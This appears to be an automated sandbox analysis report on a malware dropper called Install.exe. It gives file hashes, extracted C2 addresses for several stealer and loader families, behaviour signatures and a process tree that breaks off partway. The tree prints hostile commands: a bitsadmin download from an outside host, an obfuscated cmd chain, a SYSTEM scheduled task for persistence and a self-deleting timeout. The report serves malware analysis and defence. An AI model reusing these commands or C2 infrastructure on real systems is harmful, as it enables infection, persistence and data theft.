Resubmissions

24-04-2021 06:39

210424-lmjja25q22 10

23-04-2021 19:10

210423-f6mvfx4yyx 10

23-04-2021 19:10

210423-3qnl3etjca 10

23-04-2021 18:20

210423-4keqsccdba 10

23-04-2021 13:38

210423-1f2d5v8a2s 10

23-04-2021 04:53

210423-eenyvz5kqj 10

23-04-2021 04:53

210423-svr8rrwggs 10

23-04-2021 04:53

210423-95h13plc2x 10

22-04-2021 19:11

210422-6s1zd291s6 10

22-04-2021 19:05

210422-dsvj9bzkvn 10

Analysis

  • max time kernel
    1801s
  • max time network
    1801s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    23-04-2021 13:38

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Extracted

Family

warzonerat

C2

104.207.138.207:4531

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 3 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 42 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 60 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Install.exe
    "C:\Users\Admin\AppData\Local\Temp\Install.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4080
    • C:\Users\Admin\AppData\Local\Temp\is-MQ9EL.tmp\Install.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-MQ9EL.tmp\Install.tmp" /SL5="$2010E,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1776
      • C:\Users\Admin\AppData\Local\Temp\is-BFTBS.tmp\Ultra.exe
        "C:\Users\Admin\AppData\Local\Temp\is-BFTBS.tmp\Ultra.exe" /S /UID=burnerch1
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Adds Run key to start application
        • Drops file in Program Files directory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3980
        • C:\Program Files\Microsoft Office 15\IDCXXTLBWB\ultramediaburner.exe
          "C:\Program Files\Microsoft Office 15\IDCXXTLBWB\ultramediaburner.exe" /VERYSILENT
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4016
          • C:\Users\Admin\AppData\Local\Temp\is-V7JHQ.tmp\ultramediaburner.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-V7JHQ.tmp\ultramediaburner.tmp" /SL5="$20084,281924,62464,C:\Program Files\Microsoft Office 15\IDCXXTLBWB\ultramediaburner.exe" /VERYSILENT
            5⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:3092
            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
              6⤵
              • Executes dropped EXE
              PID:1432
        • C:\Users\Admin\AppData\Local\Temp\70-9ecef-6b8-d5d92-2d9ec293a1244\Kisaekyvavi.exe
          "C:\Users\Admin\AppData\Local\Temp\70-9ecef-6b8-d5d92-2d9ec293a1244\Kisaekyvavi.exe"
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Modifies system certificate store
          • Suspicious use of AdjustPrivilegeToken
          PID:1340
        • C:\Users\Admin\AppData\Local\Temp\99-a144a-40c-cbd95-4a9a536d4b86e\Qewalabavo.exe
          "C:\Users\Admin\AppData\Local\Temp\99-a144a-40c-cbd95-4a9a536d4b86e\Qewalabavo.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2760
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hh3tazxj.gum\instEU.exe & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:5192
            • C:\Users\Admin\AppData\Local\Temp\hh3tazxj.gum\instEU.exe
              C:\Users\Admin\AppData\Local\Temp\hh3tazxj.gum\instEU.exe
              6⤵
              • Executes dropped EXE
              PID:5376
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xqhj3lcg.x5x\gpooe.exe & exit
            5⤵
              PID:5388
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0wceh1d0.ar0\google-game.exe & exit
              5⤵
                PID:6028
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qxznayop.ihv\md1_1eaf.exe & exit
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:5672
                • C:\Users\Admin\AppData\Local\Temp\qxznayop.ihv\md1_1eaf.exe
                  C:\Users\Admin\AppData\Local\Temp\qxznayop.ihv\md1_1eaf.exe
                  6⤵
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5772
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2ltmo54e.tyq\y1.exe & exit
                5⤵
                  PID:4716
                  • C:\Users\Admin\AppData\Local\Temp\2ltmo54e.tyq\y1.exe
                    C:\Users\Admin\AppData\Local\Temp\2ltmo54e.tyq\y1.exe
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:5004
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\2ltmo54e.tyq\y1.exe"
                      7⤵
                        PID:4708
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /T 10 /NOBREAK
                          8⤵
                          • Delays execution with timeout.exe
                          PID:4260
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cy2b4rdq.sml\toolspab1.exe & exit
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:5596
                    • C:\Users\Admin\AppData\Local\Temp\cy2b4rdq.sml\toolspab1.exe
                      C:\Users\Admin\AppData\Local\Temp\cy2b4rdq.sml\toolspab1.exe
                      6⤵
                        PID:5872
                        • C:\Users\Admin\AppData\Local\Temp\cy2b4rdq.sml\toolspab1.exe
                          C:\Users\Admin\AppData\Local\Temp\cy2b4rdq.sml\toolspab1.exe
                          7⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:6100
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\czn43gbn.cyu\SunLabsPlayer.exe /S & exit
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4336
                      • C:\Users\Admin\AppData\Local\Temp\czn43gbn.cyu\SunLabsPlayer.exe
                        C:\Users\Admin\AppData\Local\Temp\czn43gbn.cyu\SunLabsPlayer.exe /S
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Drops file in Program Files directory
                        PID:4576
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst83DD.tmp\tempfile.ps1"
                          7⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5440
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst83DD.tmp\tempfile.ps1"
                          7⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5788
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst83DD.tmp\tempfile.ps1"
                          7⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5748
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst83DD.tmp\tempfile.ps1"
                          7⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5064
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst83DD.tmp\tempfile.ps1"
                          7⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4912
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst83DD.tmp\tempfile.ps1"
                          7⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5780
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst83DD.tmp\tempfile.ps1"
                          7⤵
                          • Checks for any installed AV software in registry
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5612
                        • C:\Windows\SysWOW64\bitsadmin.exe
                          "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                          7⤵
                          • Download via BitsAdmin
                          PID:4892
                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pC2KRn2c9fiF7FlK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                          7⤵
                          • Executes dropped EXE
                          PID:6028
                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -plg2ZLYGSphKc5Eq -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                          7⤵
                          • Executes dropped EXE
                          PID:4240
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst83DD.tmp\tempfile.ps1"
                          7⤵
                            PID:4396
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst83DD.tmp\tempfile.ps1"
                            7⤵
                              PID:4492
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst83DD.tmp\tempfile.ps1"
                              7⤵
                                PID:5364
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst83DD.tmp\tempfile.ps1"
                                7⤵
                                  PID:5384
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst83DD.tmp\tempfile.ps1"
                                  7⤵
                                    PID:5564
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AotYqZ\AotYqZ.dll" AotYqZ
                                    7⤵
                                    • Loads dropped DLL
                                    PID:5180
                                    • C:\Windows\system32\rundll32.exe
                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AotYqZ\AotYqZ.dll" AotYqZ
                                      8⤵
                                      • Loads dropped DLL
                                      • Drops file in System32 directory
                                      • Suspicious use of WriteProcessMemory
                                      PID:4716
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst83DD.tmp\tempfile.ps1"
                                    7⤵
                                      PID:5812
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst83DD.tmp\tempfile.ps1"
                                      7⤵
                                        PID:5024
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst83DD.tmp\tempfile.ps1"
                                        7⤵
                                        • Drops file in Program Files directory
                                        PID:3064
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst83DD.tmp\tempfile.ps1"
                                        7⤵
                                          PID:5932
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst83DD.tmp\tempfile.ps1"
                                          7⤵
                                            PID:6064
                                          • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                            "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                            7⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:3336
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4w1wnaun.ihm\GcleanerWW.exe /mixone & exit
                                        5⤵
                                          PID:4892
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zu1jme55.euh\inst.exe & exit
                                          5⤵
                                            PID:5444
                                            • C:\Users\Admin\AppData\Local\Temp\zu1jme55.euh\inst.exe
                                              C:\Users\Admin\AppData\Local\Temp\zu1jme55.euh\inst.exe
                                              6⤵
                                              • Executes dropped EXE
                                              PID:4308
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ck5qw2wh.hjn\c7ae36fa.exe & exit
                                            5⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:4944
                                            • C:\Users\Admin\AppData\Local\Temp\ck5qw2wh.hjn\c7ae36fa.exe
                                              C:\Users\Admin\AppData\Local\Temp\ck5qw2wh.hjn\c7ae36fa.exe
                                              6⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Checks SCSI registry key(s)
                                              • Suspicious behavior: MapViewOfSection
                                              PID:5348
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vltvzlqe.irx\app.exe /8-2222 & exit
                                            5⤵
                                              PID:5008
                                              • C:\Users\Admin\AppData\Local\Temp\vltvzlqe.irx\app.exe
                                                C:\Users\Admin\AppData\Local\Temp\vltvzlqe.irx\app.exe /8-2222
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5144
                                                • C:\Users\Admin\AppData\Local\Temp\vltvzlqe.irx\app.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\vltvzlqe.irx\app.exe" /8-2222
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Modifies data under HKEY_USERS
                                                  PID:4704
                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                      1⤵
                                      • Drops file in Windows directory
                                      • Modifies Internet Explorer settings
                                      • Modifies registry class
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of SetWindowsHookEx
                                      PID:4156
                                    • C:\Windows\system32\browser_broker.exe
                                      C:\Windows\system32\browser_broker.exe -Embedding
                                      1⤵
                                      • Modifies Internet Explorer settings
                                      PID:4200
                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                      1⤵
                                      • Modifies registry class
                                      • Suspicious behavior: MapViewOfSection
                                      • Suspicious use of SetWindowsHookEx
                                      PID:4952
                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                      1⤵
                                      • Modifies Internet Explorer settings
                                      • Modifies registry class
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5208
                                    • \??\c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                      1⤵
                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4388
                                    • C:\Users\Admin\AppData\Local\Temp\33F2.exe
                                      C:\Users\Admin\AppData\Local\Temp\33F2.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:4752
                                      • C:\Users\Admin\AppData\Local\Temp\33F2.exe
                                        "C:\Users\Admin\AppData\Local\Temp\33F2.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:4532
                                    • C:\Users\Admin\AppData\Local\Temp\3B55.exe
                                      C:\Users\Admin\AppData\Local\Temp\3B55.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2088
                                      • C:\Windows\SysWOW64\explorer.exe
                                        "C:\Windows\SysWOW64\explorer.exe"
                                        2⤵
                                          PID:5616
                                        • C:\Windows\SysWOW64\explorer.exe
                                          "C:\Windows\SysWOW64\explorer.exe"
                                          2⤵
                                            PID:5196
                                          • C:\Windows\SysWOW64\explorer.exe
                                            "C:\Windows\SysWOW64\explorer.exe"
                                            2⤵
                                              PID:5140
                                            • C:\Windows\SysWOW64\explorer.exe
                                              "C:\Windows\SysWOW64\explorer.exe"
                                              2⤵
                                                PID:5568
                                              • C:\Windows\SysWOW64\explorer.exe
                                                "C:\Windows\SysWOW64\explorer.exe"
                                                2⤵
                                                  PID:4900
                                              • C:\Users\Admin\AppData\Local\Temp\4355.exe
                                                C:\Users\Admin\AppData\Local\Temp\4355.exe
                                                1⤵
                                                • Executes dropped EXE
                                                • Drops startup file
                                                • NTFS ADS
                                                PID:5436
                                              • C:\Users\Admin\AppData\Local\Temp\4809.exe
                                                C:\Users\Admin\AppData\Local\Temp\4809.exe
                                                1⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious use of WriteProcessMemory
                                                PID:5444
                                              • C:\Users\Admin\AppData\Local\Temp\52C8.exe
                                                C:\Users\Admin\AppData\Local\Temp\52C8.exe
                                                1⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2136
                                              • C:\Users\Admin\AppData\Local\Temp\5819.exe
                                                C:\Users\Admin\AppData\Local\Temp\5819.exe
                                                1⤵
                                                • Executes dropped EXE
                                                PID:6120
                                              • C:\Users\Admin\AppData\Local\Temp\6103.exe
                                                C:\Users\Admin\AppData\Local\Temp\6103.exe
                                                1⤵
                                                • Executes dropped EXE
                                                PID:5280
                                                • C:\Windows\SysWOW64\makecab.exe
                                                  "C:\Windows\System32\makecab.exe"
                                                  2⤵
                                                    PID:5836
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c iqNOHdjFJRyhysPKrZOyDFL & okDksJPSlGbcVRHiSeznxx & hAaVTUKoBgyGcM & gqwjrmT & cmd < Estate.wms
                                                    2⤵
                                                      PID:2296
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd
                                                        3⤵
                                                          PID:4812
                                                          • C:\Windows\SysWOW64\findstr.exe
                                                            findstr /V /R "^IRYjqEeSlHqUOmgNEQyuRToTmXianaMtsAbasYwuofIOxmdrAdyKMFuPItNebJxSVVDheWcGOYXClxmZHrSojeaLxIJhlZImVQSnVewEUmVNHEEgENczQjFTDRTzjocPdnGzBwrEwghMuFtPrc$" Tele.wms
                                                            4⤵
                                                              PID:4616
                                                            • C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\Diritto.exe.com
                                                              Diritto.exe.com o
                                                              4⤵
                                                              • Executes dropped EXE
                                                              PID:1820
                                                              • C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\Diritto.exe.com
                                                                C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\Diritto.exe.com o
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:2740
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks.exe /create /tn "xNBSMJllYe" /tr "C:\\Users\\Admin\\AppData\\Roaming\\gXjmjGiawO\\xNBSMJllYe.exe.com C:\\Users\\Admin\\AppData\\Roaming\\gXjmjGiawO\\Q" /sc onstart /F /RU SYSTEM
                                                                  6⤵
                                                                  • Creates scheduled task(s)
                                                                  PID:5396
                                                                • C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\RegAsm.exe
                                                                  C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\RegAsm.exe
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:5872
                                                            • C:\Windows\SysWOW64\PING.EXE
                                                              ping 127.0.0.1 -n 30
                                                              4⤵
                                                              • Runs ping.exe
                                                              PID:3224
                                                      • C:\Windows\SysWOW64\explorer.exe
                                                        C:\Windows\SysWOW64\explorer.exe
                                                        1⤵
                                                          PID:3680
                                                        • C:\Windows\explorer.exe
                                                          C:\Windows\explorer.exe
                                                          1⤵
                                                            PID:6032
                                                          • C:\Windows\SysWOW64\explorer.exe
                                                            C:\Windows\SysWOW64\explorer.exe
                                                            1⤵
                                                              PID:5416
                                                            • C:\Windows\explorer.exe
                                                              C:\Windows\explorer.exe
                                                              1⤵
                                                              • Suspicious behavior: MapViewOfSection
                                                              PID:5352
                                                            • C:\Windows\SysWOW64\explorer.exe
                                                              C:\Windows\SysWOW64\explorer.exe
                                                              1⤵
                                                                PID:4796
                                                              • C:\Windows\explorer.exe
                                                                C:\Windows\explorer.exe
                                                                1⤵
                                                                • Suspicious behavior: MapViewOfSection
                                                                PID:4924
                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                C:\Windows\SysWOW64\explorer.exe
                                                                1⤵
                                                                  PID:4692
                                                                • C:\Windows\explorer.exe
                                                                  C:\Windows\explorer.exe
                                                                  1⤵
                                                                  • Suspicious behavior: MapViewOfSection
                                                                  PID:4720
                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                  1⤵
                                                                    PID:4572
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                    1⤵
                                                                      PID:5472
                                                                    • \??\c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                      1⤵
                                                                        PID:5300
                                                                      • C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                        C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:4108
                                                                        • C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                          C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Checks SCSI registry key(s)
                                                                          • Suspicious behavior: MapViewOfSection
                                                                          PID:2932
                                                                      • C:\Users\Admin\AppData\Roaming\bhuadgh
                                                                        C:\Users\Admin\AppData\Roaming\bhuadgh
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Checks SCSI registry key(s)
